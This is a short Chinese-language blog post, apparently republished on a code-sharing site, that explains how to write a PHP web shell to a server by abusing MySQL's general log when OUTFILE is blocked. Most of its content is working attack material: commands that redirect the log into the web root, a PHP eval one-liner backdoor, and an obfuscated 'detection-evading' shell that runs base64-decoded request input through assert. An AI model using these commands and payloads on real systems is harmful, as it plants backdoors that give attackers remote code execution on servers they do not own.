码迷,mamicode.com
首页 > 数据库 > 详细

SQL语句利用日志写shell

时间:2018-03-17 15:26:59      阅读:272      评论:0      收藏:0      [点我收藏+]

标签:利用   log   html   body   like   语句   sele   lob   t权限   

outfile被禁止,或者写入文件被拦截;

在数据库中操作如下:(必须是root权限)

 

show variables like ‘%general%‘;  #查看配置
 
set global general_log = on;  #开启general log模式
 
set global general_log_file = ‘/var/www/html/1.php‘;   #设置日志目录为shell地址
 
select ‘<?php eval($_POST[cmd]);?>‘  #写入shell

SQL查询免杀shell的语句

SELECT "<?php $p = array(‘f‘=>‘a‘,‘pffff‘=>‘s‘,‘e‘=>‘fffff‘,‘lfaaaa‘=>‘r‘,‘nnnnn‘=>‘t‘);$a = array_keys($p);$_=$p[‘pffff‘].$p[‘pffff‘].$a[2];$_= ‘a‘.$_.‘rt‘;$_(base64_decode($_REQUEST[‘username‘]));?>"

SQL语句利用日志写shell

SQL语句利用日志写shell

标签:利用   log   html   body   like   语句   sele   lob   t权限   

原文地址:https://www.cnblogs.com/hookjoy/p/8589509.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!